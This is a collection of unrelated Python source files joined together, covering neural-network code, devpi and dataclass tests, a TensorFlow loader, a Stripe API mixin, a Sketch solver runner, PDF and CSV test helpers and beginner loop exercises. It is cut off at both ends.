                x4 = self.activation(self.bn4(self.cv4(x3, support3, support4, ids4)))
                x5 = self.activation(self.bn5(self.cv5(x4, support4, support5, ids5)))
                x6 = self.activation(self.bn6(self.cv6(x5, support5, support6, ids6)))
                # Decoder pass with skip-connection concatenations.
                x = self.activation(self.bn5d(self.cv5d(x6, support6, support5, ids5d)))
                x = torch.cat([x, x5], dim=1)
                x = self.activation(self.bn4d(self.cv4d(x, support5, support4, ids4d)))
                x = torch.cat([x, x4], dim=1)
                x = self.activation(self.bn3d(self.cv3d(x, support4, support3, ids3d)))
                x = torch.cat([x, x3], dim=1)
                x = self.activation(self.bn2d(self.cv2d(x, support3, support2, ids2d)))
                x = torch.cat([x, x2], dim=1)
                x = self.activation(self.bn1d(self.cv1d(x, support2, support1, ids1d)))
                x = torch.cat([x, x1], dim=1)
                x = self.activation(self.bn0d(self.cv0d(x, support1, pos, ids0d)))
                x = torch.cat([x, x0], dim=1)
                x = self.dropout(x)
                x = self.fcout(x)
            return x, [support1, support2, support3, support4, support5, support6], [ids0, ids1, ids2, ids3, ids4, ids5, ids6, ids5d, ids4d, ids3d, ids2d, ids1d, ids0d]
        else:
            if support_points is not None:
                support1, support2, support3, support4, support5 = support_points
            else:
                support1, support2, support3, support4, support5 = [None for _ in range(5)]
            if neighbors_indices is not None:
                ids1, ids2, ids3, ids4, ids5 = neighbors_indices
            else:
                ids1, ids2, ids3, ids4, ids5 = [None for _ in range(5)]
            support1, _ = sampling(pos, 0.25, support1, None)
            ids1 = knn(pos, support1, 16, ids1)
            support2, _ = sampling(support1, 0.25, support2, None)
            ids2 = knn(support1, support2, 16, ids2)
            support3, _ = sampling(support2, 0.25, support3, None)
            ids3 = knn(support2, support3, 16, ids3)
            support4, _ = sampling(support3, 0.25, support4, None)
            ids4 = knn(support3, support4, 16, ids4)
            support5, _ = sampling(support4, 0.25, support5, None)
            ids5 = knn(support4, support5, 16, ids5)
            if x is not None:
                x = self.activation(self.bn1(self.cv1(x, pos, support1, ids1)))
                x = self.activation(self.bn2(self.cv2(x, support1, support2, ids2)))
                x = self.activation(self.bn3(self.cv3(x, support2, support3, ids3)))
                x = self.activation(self.bn4(self.cv4(x, support3, support4, ids4)))
                x = self.activation(self.bn5(self.cv5(x, support4, support5, ids5)))
                # Global average pooling over remaining points, then classify.
                x = x.mean(dim=2)
                x = self.dropout(x)
                x = self.fcout(x)
            return x, [support1, support2, support3, support4, support5], [ids1, ids2, ids3, ids4, ids5]
    # def forward_without_features(self, pos, support_points=None, indices=None):
    #     if self.segmentation:
    #         _, _, ids0 = self.cv0(None, pos)
    #         _, support1, ids1 = self.cv1(None, pos)
    #         _, support2, ids2 = self.cv2(None, support1[0])
    #         _, support3, ids3 = self.cv3(None, support2[0])
    #         _, support4, ids4 = self.cv4(None, support3[0])
    #         _, support5, ids5 = self.cv5(None, support4[0])
    #         _, support6, ids6 = self.cv6(None, support5[0])
    #         _, _, ids5d = self.cv5d(None, support6[0], support5[0])
    #         _, _, ids4d = self.cv4d(None, support5[0], support4[0])
    #         _, _, ids3d = self.cv3d(None, support4[0], support3[0])
    #         _, _, ids2d = self.cv2d(None, support3[0], support2[0])
    #         _, _, ids1d = self.cv1d(None, support2[0], support1[0])
    #         _, _, ids0d = self.cv0d(None, support1[0], pos)
    #         support_points = support1 + support2 + support3 + support4 + support5 + support6
    #         indices = ids0 + ids1 + ids2 + ids3 + ids4 + ids5 + ids6 + ids5d + ids4d + ids3d + ids2d + ids1d + ids0d
    #         return None, support_points, indices
    #     else:
    #         _, support1, ids1 = self.cv1(None, pos)
    #         _, support2, ids2 = self.cv2(None, support1[0])
    #         _, support3, ids3 = self.cv3(None, support2[0])
    #         _, support4, ids4 = self.cv4(None, support3[0])
    #         _, support5, ids5 = self.cv5(None, support4[0])
    #         support_points = support1 + support2 + support3 + support4 + support5
    #         indices = ids1 + ids2 + ids3 + ids4 + ids5
    #         return None, support_points, indices
    # def forward_with_features(self, x, pos, support_points=None, indices=None):
    #     if self.segmentation:
    #         ids0, ids1, ids2, ids3, ids4, ids5, ids6, ids5d, ids4d, ids3d, ids2d, ids1d, ids0d = indices
    #         support0, support1, support2, support3, support4, support5, support6 = support_points
    #         ids0 = knn(pos, pos, 16, ids0)
    #         x0 = self.activation(self.bn0(self.cv0(x, pos, support0, ids0)))
    #         x1 = self.activation(self.bn1(self.cv1(x0, support0, support1, ids1)))
    #         x2 = self.activation(self.bn2(self.cv2(x1, support1, support2, ids2)))
    #         x3 = self.activation(self.bn3(self.cv3(x2, support2, support3, ids3)))
    #         x4 = self.activation(self.bn4(self.cv4(x3, support3, support4, ids4)))
    #         x5 = self.activation(self.bn5(self.cv5(x4, support4, support5, ids5)))
    #         x6 = self.activation(self.bn6(self.cv6(x5, support5, support6, ids6)))
    #         x = self.activation(self.bn5d(self.cv5d(x6, support6, support5, ids5d)))
    #         x = torch.cat([x, x5], dim=1)
    #         x = self.activation(self.bn4d(self.cv4d(x, support5, support4, ids4d)))
    #         x = torch.cat([x, x4], dim=1)
    #         x = self.activation(self.bn3d(self.cv3d(x, support4, support3, ids3d)))
    #         x = torch.cat([x, x3], dim=1)
    #         x = self.activation(self.bn2d(self.cv2d(x, support3, support2, ids2d)))
    #         x = torch.cat([x, x2], dim=1)
    #         x = self.activation(self.bn1d(self.cv1d(x, support2, support1, ids1d)))
    #         x = torch.cat([x, x1], dim=1)
    #         x = self.activation(self.bn0d(self.cv0d(x, support1, support0, ids0d)))
    #         x = torch.cat([x, x0], dim=1)
    #         x = self.dropout(x)
    #         x = self.fcout(x)
    #     else:
    #         ids1, ids2, ids3, ids4, ids5 = indices
    #         support1, support2, support3, support4, support5 = support_points
    #         x = self.activation(self.bn1(self.cv1(x, pos, support1, ids1)))
    #         x = self.activation(self.bn2(self.cv2(x, support1, support2, ids2)))
    #         x = self.activation(self.bn3(self.cv3(x, support2, support3, ids3)))
    #         x = self.activation(self.bn4(self.cv4(x, support3, support4, ids4)))
    #         x = self.activation(self.bn5(self.cv5(x, support4, support5, ids5)))
    #         x = x.mean(dim=2)
    #         x = self.dropout(x)
    #         x = self.fcout(x)
    #     return x
|
import os
import sys
import json
import time
import unittest
import run_devpi
# Resolve paths relative to this file's directory, not the CWD.
# BUG FIX: the original used __name__ (a module-name string like "__main__"),
# which abspath() resolved against the current working directory; __file__
# is the actual path of this source file.
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
# We use testpkg as a sample Python module to publish.
TEST_PACKAGE_PATH = os.path.join(BASE_PATH, 'testpkg')
class DevpiTestCase(unittest.TestCase):
    """Integration tests that publish a sample package to a live devpi server."""
    # Input payload mimicking what the Drone plugin receives.
    basic_input = {
        "workspace": {
            "path": TEST_PACKAGE_PATH,
        },
        "vargs": {
            "server": "http://localhost:3141/",
            "index": "root/devpitest",
            "username": "root",
            "password": "",
        }
    }
    # We'll override the default clientdir while creating our index below.
    default_clientdir = '/tmp/devpi-testclientdir'
    @classmethod
    def setUpClass(cls):
        # We'll only do this once so we're not hammering the server if we
        # grow this test suite.
        cls._wait_for_devpi_to_start(cls.basic_input, cls.default_clientdir)
    def setUp(self):
        # Save sys.argv so tests can overwrite it and tearDown can restore it.
        self.old_argv_val = sys.argv
    def tearDown(self):
        sys.argv = self.old_argv_val
    @classmethod
    def _wait_for_devpi_to_start(cls, input_dict, clientdir):
        """
        devpi is a bit... pokey while starting. We'll just harass it until
        it responds before doing the rest of the tests.
        """
        # NOTE(review): if all 30 retries fail this returns silently and the
        # first real test will fail instead -- confirm that's acceptable.
        retries_left = 30
        while retries_left > 0:
            try:
                run_devpi.select_server(
                    input_dict['vargs']['server'], clientdir=clientdir)
            except SystemExit:
                # select_server exits non-zero while the server is still
                # booting; back off for a second and retry.
                retries_left -= 1
                time.sleep(1)
                continue
            return
    def _ensure_test_index_exists(self, input_dict, clientdir):
        """
        Since Drone fires up a new devpi server for each test run, we'll
        need to create an index before we can upload.
        """
        t_vargs = input_dict['vargs']
        run_devpi.select_server(
            t_vargs['server'], clientdir=clientdir)
        run_devpi.login(
            t_vargs['username'], t_vargs['password'],
            clientdir=self.default_clientdir)
        try:
            run_devpi.create_index(
                t_vargs['index'], clientdir=clientdir)
        except SystemExit:
            # Index already exists from a previous run; that's fine.
            pass
    def test_upload(self):
        """
        Tests a simple package upload to an existing DevPi server.
        """
        self._ensure_test_index_exists(
            self.basic_input, self.default_clientdir)
        # run_devpi.main() reads its JSON payload from argv.
        sys.argv = ['--', json.dumps(self.basic_input)]
        run_devpi.main()
class ValidationTestCase(unittest.TestCase):
    """Unit tests for run_devpi's vargs validation (no live server needed)."""
    def setUp(self):
        # Rebuilt for every test so mutations don't leak between tests.
        self.basic_input = {
            "workspace": {
                "path": TEST_PACKAGE_PATH,
            },
            "vargs": {
                "server": "http://localhost:3141/",
                "index": "root/devpitest",
                "username": "root",
                "password": "",
            }
        }
    def test_vargs_server_validation(self):
        """
        Tests validation for vargs server keyword.
        """
        # NOTE(review): .copy() is shallow, so this 'vargs' is the same dict
        # as self.basic_input['vargs']; harmless here since setUp rebuilds it.
        vargs = self.basic_input.copy()['vargs']
        # Start the party with something weird.
        vargs['server'] = 'blah'
        self.assertRaises(SystemExit, run_devpi.check_vargs, vargs)
        # Why not?
        vargs['server'] = None
        self.assertRaises(SystemExit, run_devpi.check_vargs, vargs)
        vargs['server'] = ''
        self.assertRaises(SystemExit, run_devpi.check_vargs, vargs)
        # Protocol isn't included.
        vargs['server'] = 'somehost.com/'
        self.assertRaises(SystemExit, run_devpi.check_vargs, vargs)
        # Relative paths aren't useful.
        vargs['server'] = '/somewhere'
        self.assertRaises(SystemExit, run_devpi.check_vargs, vargs)
        # As if the user didn't pass it at all.
        del vargs['server']
        self.assertRaises(SystemExit, run_devpi.check_vargs, vargs)
        # These should all be valid.
        vargs['server'] = 'http://test.com/'
        self.assertIsNone(run_devpi.check_vargs(vargs))
        vargs['server'] = 'http://test.com/devpi/'
        self.assertIsNone(run_devpi.check_vargs(vargs))
        vargs['server'] = 'http://test.com:3141/'
        self.assertIsNone(run_devpi.check_vargs(vargs))
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
|
import tensorflow as tf
import numpy as np
class VariableData:
    """Record for one saved variable: its name, shape tuple, and values array."""
    def __init__(self):
        # All fields start unset; the loader fills them in while parsing.
        self.name = self.shape = self.values = None
class ModelLoader:
    """Loads a serialized TF GraphDef (graph.pb) plus variable values
    (variables.dat) from a folder, and builds a feed dict from them."""
    def __init__(self, folder_path):
        """
        :param folder_path: string
        """
        # NOTE(review): paths are built with string concatenation, so
        # folder_path presumably ends with a separator -- confirm callers.
        self.folder_path = folder_path
        self._open_graph_def()
    def create_feed_dict(self):
        # Map each variable's first-output tensor name (":0") to its values.
        # Requires create_variable_data() to have been called first.
        self.feed_dict = {}
        for var in self._variables:
            self.feed_dict[var.name+":0"] = var.values
    def _open_graph_def(self):
        # Parse the serialized GraphDef protobuf from graph.pb.
        self.graph_def = tf.GraphDef()
        with open(self.folder_path + "graph.pb", "rb") as f:
            self.graph_def.ParseFromString(f.read())
    def create_variable_data(self, folder_path=None):
        # variables - list of tuples (name, shape, values)
        self._variables = []
        if folder_path is None:
            folder_path = self.folder_path
        # states for reading file
        eStart, eName, eShape, eValues = range(0, 4)
        state = eName
        with open(folder_path + "variables.dat") as f:
            var_data = VariableData()
            for line in f:
                line = line.split()
                if state == eStart:
                    # NOTE(review): this state consumes one whole line between
                    # records -- presumably a separator line in variables.dat;
                    # confirm against the file format.
                    var_data = VariableData()
                    state = eName
                    continue
                elif state == eName:
                    var_data.name = line[0]
                    state = eShape
                    continue
                elif state == eShape:
                    var_data.shape = tuple([int(x) for x in line])
                    state = eValues
                    continue
                elif state == eValues:
                    # Flat list of floats reshaped to the declared shape.
                    var_data.values = np.array([float(x) for x in line])
                    var_data.values = var_data.values.reshape(var_data.shape)
                    self._variables.append(var_data)
                    state = eStart
                    continue
|
from __future__ import absolute_import, division, print_function
from stripe_modern.api_resources.abstract.api_resource import APIResource
from stripe_modern import api_requestor, util
class CreateableAPIResource(APIResource):
    """Mixin adding a ``create`` classmethod for POST-able API resources."""
    @classmethod
    def create(
        cls,
        api_key=None,
        idempotency_key=None,
        stripe_version=None,
        stripe_account=None,
        **params
    ):
        """Create a new resource by POSTing ``params`` to the class URL.

        :param api_key: API key override for this request.
        :param idempotency_key: sent as a header so retries are safe.
        :param stripe_version: API version override.
        :param stripe_account: connected-account override.
        :returns: the created resource as a stripe object.
        """
        requestor = api_requestor.APIRequestor(
            api_key, api_version=stripe_version, account=stripe_account
        )
        url = cls.class_url()
        headers = util.populate_headers(idempotency_key)
        # requestor.request returns the parsed response plus the key used.
        response, api_key = requestor.request("post", url, params, headers)
        return util.convert_to_stripe_object(
            response, api_key, stripe_version, stripe_account
        )
|
# from __future__ import annotations
import logging
import unittest
from dataclasses import dataclass, fields, Field, asdict, make_dataclass, \
_FIELDS
from pprint import pprint
from typing import List, Optional
from unittest import TestCase
from dacite import from_dict
from foxylib.tools.collections.collections_tool import smap
from future.utils import lmap
from foxylib.tools.dataclass.dataclass_tool import DataclassTool
from foxylib.tools.log.foxylib_logger import FoxylibLogger
class TestDataclassTool(TestCase):
    """Tests for DataclassTool helpers (field reset, schema trees, jpaths)."""
    @classmethod
    def setUpClass(cls):
        FoxylibLogger.attach_stderr2loggers(logging.DEBUG)
    def test_01(self):
        # allfields2none should reset every field on a mutable dataclass.
        logger = FoxylibLogger.func_level2logger(self.test_01, logging.DEBUG)
        @dataclass
        class A:
            x: int = None
            y: str = None
        a = A()
        a.x = 1
        self.assertEqual(a.x, 1)
        DataclassTool.allfields2none(a)
        self.assertIsNone(a.x,)
    def test_02(self):
        # dacite.from_dict should build a frozen dataclass equal to direct
        # construction (missing optional fields default to None).
        logger = FoxylibLogger.func_level2logger(self.test_02, logging.DEBUG)
        @dataclass(frozen=True)
        class A:
            z: dict
            x: int = None
            y: str = None
        a = from_dict(A, {'x': 1, 'z': {'a': 9}})
        self.assertEqual(a, A(**{'x': 1, 'z': {'a': 9}}))
    def test_03(self):
        # schema2dataclass_tree builds nested dataclasses from a schema list;
        # jpath2subdataclass extracts the nested class at a json path.
        schema = [
            ('x', int,),
            ('y', [
                ('i', int,),
                ('j', str,),
            ]),
            ('z', str,),
        ]
        A = DataclassTool.schema2dataclass_tree('A', schema)
        dict_a = {'x': 1, 'y': {'i': 1, 'j': 'hello'}, 'z': 'bye'}
        a = from_dict(A, dict_a)
        self.assertEqual(asdict(a), dict_a)
        dict_y = {'i': 9, 'j': 'oh'}
        Y = DataclassTool.jpath2subdataclass(A, ['y'])
        y = from_dict(Y, dict_y)
        self.assertEqual(asdict(y), dict_y)
        print({'a': a, 'y': y})
    def test_04(self):
        # Inline make_dataclass as a field type also round-trips via asdict.
        @dataclass(frozen=True)
        class A:
            x: int
            y: make_dataclass("Y", [('i', int,), ('j', str,), ])
            z: str
        dict_a = {'x': 1, 'y': {'i': 1, 'j': 'hello'}, 'z': 'bye'}
        a = from_dict(A, dict_a)
        self.assertEqual(asdict(a), dict_a)
        print({'a': a, })
    def test_05(self):
        # json2filtered drops keys that aren't dataclass fields.
        logger = FoxylibLogger.func_level2logger(self.test_05, logging.DEBUG)
        @dataclass(frozen=True)
        class A:
            x: int
            y: str
        self.assertEqual(DataclassTool.dataclass2fieldnames(A), {'x', 'y'})
        self.assertEqual(
            DataclassTool.json2filtered(A, {'x': 1, 'y': 'a', 'z': 'adsf'}),
            {'x': 1, 'y': 'a', })
    def test_06(self):
        @dataclass(frozen=True)
        class A:
            x: int
        self.assertEqual(DataclassTool.fieldname2checked(A, 'x'), 'x')
    def test_07(self):
        @dataclass(frozen=True)
        class A:
            x: int
        self.assertTrue(DataclassTool.fieldname2is_valid(A, 'x'))
    @unittest.skip(reason="can't make it work")
    def test_08(self):
        # Self-referential Optional[A] via name shadowing; skipped upstream.
        class A: pass
        @dataclass(frozen=True)
        class A:
            x: int
            a: Optional[A] = None
        a = from_dict(A, {'x':3, 'a':{'x':4,}})
        self.assertTrue(a.x, 3)
        # self.assertTrue(a.a_list[0].x, 4)
        # self.assertTrue(a.a_list[1].x, 5)
    def test_09(self):
        # The first class A provides A.B for the annotation of the second A.
        # NOTE(review): assertTrue(value, msg) only checks truthiness; the
        # second argument is a message, not an expected value.
        class A:
            @dataclass(frozen=True)
            class B:
                y: str
        @dataclass(frozen=True)
        class A:
            x: int
            bs: List[A.B]
        a = from_dict(A, {'x':3, 'bs':[{'y':'a'}, {'y':'b'}]})
        self.assertTrue(a.x, 3)
        self.assertTrue(a.bs[0].y, 'a')
        self.assertTrue(a.bs[1].y, 'b')
    def test_10(self):
        # jpath2replaced / jpaths2replaced return copies with values swapped
        # at the given json paths.
        class A:
            @dataclass(frozen=True)
            class B:
                y: str
        @dataclass(frozen=True)
        class A:
            x: int
            bs: List[A.B]
        a = from_dict(A, {'x': 3, 'bs': [{'y': 'a'}, {'y': 'b'}]})
        a2 = DataclassTool.jpath2replaced(a, ['bs', 0, 'y'], 'c')
        self.assertTrue(a2.bs[0].y, 'c')
        b = from_dict(A, {'x': 3, 'bs': [{'y': 'a'}, {'y': 'b'}]})
        b2 = DataclassTool.jpaths2replaced(b, [(['bs', 0, 'y'], 'p'), (['bs', 1, 'y'], 'q')])
        self.assertTrue(b2.bs[0].y, 'p')
        self.assertTrue(b2.bs[1].y, 'q')
|
#!/usr/bin/env python
import datetime
import math
import multiprocessing
import os
import shutil
import subprocess32 as subp
import sys
# Directory where per-run log files are written.
DATA = "data"
# Globals populated from the command line in the __main__ block below.
b = ""           # benchmark name (-conc-benchmark)
trials = 1       # number of parallel attempts (-conc-repeat)
timeout = None   # per-run timeout in minutes (-conc-timeout)
register = None  # "True" to register logs into the database (-conc-register)
def find_arg(argv, arg, offset=0):
    # Return the value for `arg` in argv: the token at i+offset for an exact
    # match, or the text after '=' for a --key=value token; None if absent.
    for position, token in enumerate(argv):
        if arg not in token:
            continue
        if token == arg:
            return argv[position + offset]
        if "=" in token:
            return token.split("=")[-1]
    return None
def remove_arg(argv, arg):
    # Return a copy of argv with every token containing `arg` removed.
    # Note: substring match, so "-o" also removes "-output".
    # Rewritten as a comprehension: the original used xrange, which is
    # Python-2-only; this form runs identically on both 2 and 3.
    return [token for token in argv if arg not in token]
def repl_output_path(argv, path):
    # Return a copy of argv where the token following each "-o" flag is
    # replaced by `path`.
    replaced = list(argv)
    for position, token in enumerate(argv):
        if token == "-o":
            replaced[position + 1] = path
    return replaced
def run(cmd, argv, seed):
    # Run one cegis attempt with the given seed, logging to a per-run file.
    # Returns (output_path, success_flag).
    # Timeout is configured in minutes; subprocess32 expects seconds.
    # NOTE(review): relies on Python 2 semantics of `None > 0` being False
    # when no timeout was given.
    _timeout = timeout * 60 if timeout > 0 else None
    output_path = find_arg(argv, "-o", 1)
    _argv = argv[:]
    _argv.insert(0, str(seed))
    _argv.insert(0, "--seed")
    s_cmd = " ".join([cmd] + _argv)
    degree = find_arg(argv, "-randdegree", 1)
    # Per-run log file, keyed by benchmark name, degree and seed.
    output = os.path.join(DATA, "{}_single_{}_{}.txt".format(b, degree, str(seed)))
    res = False
    with open(output, 'w') as f:
        f.write("[psketch] {}{}".format(s_cmd, os.linesep))
        exit_code = -1
        try:
            exit_code = subp.check_call([cmd] + _argv, stdout=f, timeout=_timeout)
            if exit_code == 0: res = True
        except subp.CalledProcessError:
            f.write("[psketch] maybe failed{}".format(os.linesep))
        except subp.TimeoutExpired:
            f.write("[psketch] timed out: {}{}".format(_timeout*1000, os.linesep))
        f.write("[psketch] backend exit code: {}{}".format(exit_code, os.linesep))
    if register and register == "True":
        # Register the log into the results database, then delete the file.
        try:
            _opts = []
            _opts.extend(["-c", "register"])
            _opts.extend(["-f", output])
            _opts.extend(["-s"]) # single-threaded
            _opts.extend(["-e", "11"])
            #_opts.extend(["-v"])
            subp.check_call(["./db.py"] + _opts)
        except subp.CalledProcessError:
            print "database registration failed", output
        finally:
            if os.path.exists(output):
                os.remove(output)
    return (output_path, res)
def p_run(cmd, argv):
    # Launch `trials` runs of run() in a process pool; the first successful
    # run's output file is copied to the requested output path.
    # Returns (output_path, success_flag).
    output_path = find_arg(argv, "-o", 1)
    n_cpu = multiprocessing.cpu_count()
    pool = multiprocessing.Pool(max(1, int(n_cpu * 0.83)))
    # Derive a distinct seed base from the current wall-clock time, scaled
    # so that seed+i stays unique across trials.
    now = int(datetime.datetime.now().strftime("%H%M%S"))
    seed = now * (10 ** int(math.log(trials, 10)))
    # Python 2 tuple-parameter syntax: callback receives run()'s result pair.
    def found( (fname, r) ):
        if r: # found, copy that output file
            shutil.copyfile(fname, output_path)
            #pool.close()
            #pool.terminate() # other running processes will become zombies here
    results = []
    temps = []
    try:
        for i in xrange(trials):
            # Each trial writes to its own numbered output file.
            _output_path = output_path + str(i)
            temps.append(_output_path)
            _argv = repl_output_path(argv, _output_path)
            r = pool.apply_async(run, (cmd, _argv, abs(seed+i)), callback=found)
            results.append(r)
        pool.close()
    except KeyboardInterrupt:
        pool.close()
        pool.terminate()
    except AssertionError: # apply_async is called after pool was terminated
        pass
    finally:
        pool.join()
    # clean up temporary files, while merging synthesis result
    res = False
    for i, fname in enumerate(temps):
        try:
            _fname, r = results[i].get(timeout=1) # very short timeout to kill zombies
            res = res or r
            assert fname == _fname
        except IndexError:
            pass # in case where temps.append happens but the loop finishes just before pool.apply_async
        except multiprocessing.TimeoutError: # zombie case
            pass
        finally:
            if os.path.exists(fname):
                os.remove(fname)
    return (output_path, res)
if __name__ == "__main__":
    # Locate the cegis backend relative to SKETCH_HOME (tarball vs source tree).
    sketch_home = os.environ["SKETCH_HOME"]
    if "runtime" in sketch_home: # using tar ball
        sketch_root = os.path.join(sketch_home, "..", "..")
    else: # from source
        sketch_root = os.path.join(sketch_home, "..")
    cegis = os.path.join(sketch_root, "sketch-backend", "src", "SketchSolver", "cegis")
    argv = sys.argv[1:]
    # Pull out our wrapper-specific -conc-* options, then strip them before
    # forwarding the remaining arguments to the backend.
    b = find_arg(argv, "-conc-benchmark")
    trials = int(find_arg(argv, "-conc-repeat"))
    timeout = int(find_arg(argv, "-conc-timeout"))
    register = find_arg(argv, "-conc-register")
    argv = remove_arg(argv, "-conc-benchmark")
    argv = remove_arg(argv, "-conc-repeat")
    argv = remove_arg(argv, "-conc-timeout")
    argv = remove_arg(argv, "-conc-register")
    _, res = p_run(cegis, argv)
    # Exit status mirrors synthesis success (0 = found, 1 = not found).
    if res: sys.exit(0)
    else: sys.exit(1)
|
from plumbum.machines.local import LocalCommand, LocalMachine, local
from plumbum.machines.remote import BaseRemoteMachine, RemoteCommand
from plumbum.machines.ssh_machine import PuttyMachine, SshMachine
# Explicit public API of this subpackage (the names re-exported above).
__all__ = (
    "LocalCommand",
    "LocalMachine",
    "local",
    "BaseRemoteMachine",
    "RemoteCommand",
    "PuttyMachine",
    "SshMachine",
)
|
"""
testapp.tests.utils
Utility functions for assisting with unit tests.
"""
import os
import tempfile
from io import BytesIO
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfinterp import PDFPageInterpreter, PDFResourceManager
from pdfminer.pdfpage import PDFPage
def findChromePath():
    """
    Check for a working path to a Google Chrome instance and return it. Raise Exception if none found.
    Use this in all unit tests whenever a valid Chrome path instance is needed.
    """
    # Candidate install locations, checked in order. Generalized to also
    # cover 64-bit Windows installs and common Linux paths.
    chrome_paths = [
        # Windows
        r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe",
        r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        # MacOS
        r"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
        # Linux
        "/usr/bin/google-chrome",
        "/usr/bin/google-chrome-stable",
    ]
    for p in chrome_paths:
        if os.path.exists(p):
            return p
    raise RuntimeError('findChromePath() could not find a Google Chrome instance.')
def extractText(pdfbytes):
    """Use pdfminer to take a pdf file-like-object/stream and return its text as a str."""
    source = BytesIO(pdfbytes)
    sink = BytesIO()
    manager = PDFResourceManager()
    device = TextConverter(manager, sink, codec='utf-8', laparams=LAParams())
    interpreter = PDFPageInterpreter(manager, device)
    for page in PDFPage.get_pages(source, caching=True, check_extractable=True):
        interpreter.process_page(page)
    extracted = sink.getvalue()
    device.close()
    sink.close()
    # Some pdfminer builds hand back bytes; normalize to str.
    if not isinstance(extracted, str):
        extracted = extracted.decode('utf8')
    return extracted
def createTempFile(file_bytes):
    """Create a temporary file with byte/str contents, and then close it."""
    # Normalize str input to bytes so the binary write below always works.
    payload = file_bytes.encode('utf8') if isinstance(file_bytes, str) else file_bytes
    # delete=False: the closed file must remain on disk so callers can open it.
    tmp = tempfile.NamedTemporaryFile(delete=False)
    tmp.write(payload)
    tmp.close()
    return tmp
|
def test_empty_object(worksheet):
    """A fresh worksheet starts with no sheet items."""
    assert worksheet.sheet_items == []
def test_parse_csv_header(worksheet):
    """The CSV header row is parsed into the worksheet's header dict."""
    ws = worksheet
    path = "tests/inventory.csv"
    # Use a context manager so the handle is closed even if parsing fails
    # (the original leaked the open file).
    with open(path, "r", encoding="utf-8-sig") as csv_file:
        ws.csv_to_dict(csv_file=csv_file, delimiter=";")
    ws_header = ws.header
    assert "Bratislava" in str(ws_header)
    assert "SK" in str(ws_header)
    assert ws_header == {
        "country": "SK",
        "city": "Bratislava",
        "citizens": "400000",
        "": "11",
        "random_field": "cc",
    }
    # The empty-named column is preserved as a key.
    assert "" in ws_header
def test_parse_csv_all_items(worksheet):
    """csv_to_dict returns all parsed rows."""
    ws = worksheet
    path = "tests/inventory.csv"
    # Context manager closes the file (the original leaked the open handle).
    with open(path, "r", encoding="utf-8-sig") as csv_file:
        ws_items = ws.csv_to_dict(csv_file=csv_file, delimiter=";")
    assert "Bratislava" in str(ws_items)
    assert "Miami" in str(ws_items)
def test_parse_csv_sheet_items(worksheet):
    """After parsing, sheet_items holds every row including empty-named keys."""
    ws = worksheet
    path = "tests/inventory.csv"
    # Context manager closes the file (the original leaked the open handle).
    with open(path, "r", encoding="utf-8-sig") as csv_file:
        ws.csv_to_dict(csv_file=csv_file, delimiter=";")
    ws_items = ws.sheet_items
    assert "Bratislava" in str(ws_items)
    assert "Miami" in str(ws_items)
    assert '' in ws_items[0]
    assert len(ws_items) > 1
    assert len(ws_items) == 6
def test_sanitize_sheet_items(worksheet):
    """sanitize_sheet_items drops the empty-named column from each row."""
    ws = worksheet
    path = "tests/inventory.csv"
    # Context manager closes the file (the original leaked the open handle).
    with open(path, "r", encoding="utf-8-sig") as csv_file:
        ws.csv_to_dict(csv_file=csv_file, delimiter=";")
    ws_items = ws.sanitize_sheet_items
    assert "Bratislava" in str(ws_items)
    assert "Miami" in str(ws_items)
    assert "" not in ws_items[0]
|
'''
Created on 19/05/2012
@author: Willis Polanco
'''
def main():
    # Exercise launcher: only calculoPotencia() is active; uncomment one of
    # the lines below to run a different exercise instead.
    # naturales()
    # impares()
    # pares()
    # multiplo4()
    # sumaReverso()
    # suma()
    # producto()
    # capturaNumero()
    # sumaParImpar()
    # multiplo3()
    calculoPotencia()
def naturales():
    """Print the first 25 natural numbers, one per line."""
    for numero in range(1, 26):
        print(numero)
def impares():
    """Print the odd numbers from 1 to 25, inclusive, on a single line."""
    linea = ''.join(' %i' % n for n in range(1, 26) if n % 2 != 0)
    print(linea)
def pares():
    """Print the even numbers from 40 to 60, inclusive, on a single line."""
    linea = ''.join(' %i' % n for n in range(40, 61) if n % 2 == 0)
    print(linea)
def multiplo4():
    """Print the sequence 48, 52, 56, ..., 120 on a single line."""
    linea = ''.join(' %i' % n for n in range(48, 121, 4))
    print(linea)
def sumaReverso():
    """Print the descending sequence 100, 95, 90, ..., 20 on a single line.

    (The original comment described a different exercise; this is what the
    code actually does.)
    """
    linea = ''.join(' %i' % n for n in range(100, 19, -5))
    print(linea)
def suma():
    """Compute and print the sum 1+2+3+...+50."""
    print(sum(range(1, 51)))
def producto():
    """Compute and print the product 1*2*3*...*20 (i.e. 20!)."""
    resultado = 1
    for factor in range(1, 21):
        resultado *= factor
    print(resultado)
def capturaNumero():
    """Read an integer from the keyboard and report whether it is even or odd."""
    numero = int(input('Introduzca un numero: '))
    mensaje = 'Este numero es par' if numero % 2 == 0 else 'Este numero es impar'
    print(mensaje)
def sumaParImpar():
    """Print 1..100, then the separate sums of the even and the odd numbers."""
    suma_pares = 0
    suma_impares = 0
    for numero in range(1, 101):
        print(numero)
        if numero % 2 == 0:
            suma_pares += numero
        else:
            suma_impares += numero
    print('\nLa suma de los pares es igual a %i' % suma_pares)
    print('La suma de los impares es igual a %i' % suma_impares)
def multiplo3():
    """Print and count the multiples of 3 between 1 and 100 (inclusive)."""
    contador = 0
    # Include 100 itself, as the exercise states "entre 1 y 100".  The
    # original loop stopped at 99; the printed output is identical either
    # way because 100 is not a multiple of 3, but this matches the intent.
    for n in range(1, 101):
        if n % 3 == 0:
            print(n)
            contador += 1
    print('\nEntre 1 y 100 hay %i numeros multiplos de 3' % contador)
def calculoPotencia():
    """Read two integers A and B and:

    - if A >= B, compute and print the sum 10+14+18+...+50;
    - if A/B <= 30, compute and print A^2 + B^2.
    """
    a = int(input('Primer valor: '))
    b = int(input('Segundo valor: '))
    if a >= b:
        suma = sum(range(10, 51, 4))
        print(suma)
    # Guard against b == 0: the original raised ZeroDivisionError here.
    if b != 0 and a / b <= 30:
        sumas = a ** 2 + b ** 2
        print(sumas)
if __name__ == '__main__':
main() |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# pylint: disable=too-many-lines
"""
Custom filters for use in openshift-ansible
"""
from ansible import errors
def odc_join_files_from_dict(files, inc_dict):
    '''Insert each {name, path} entry from *files* into *inc_dict* as
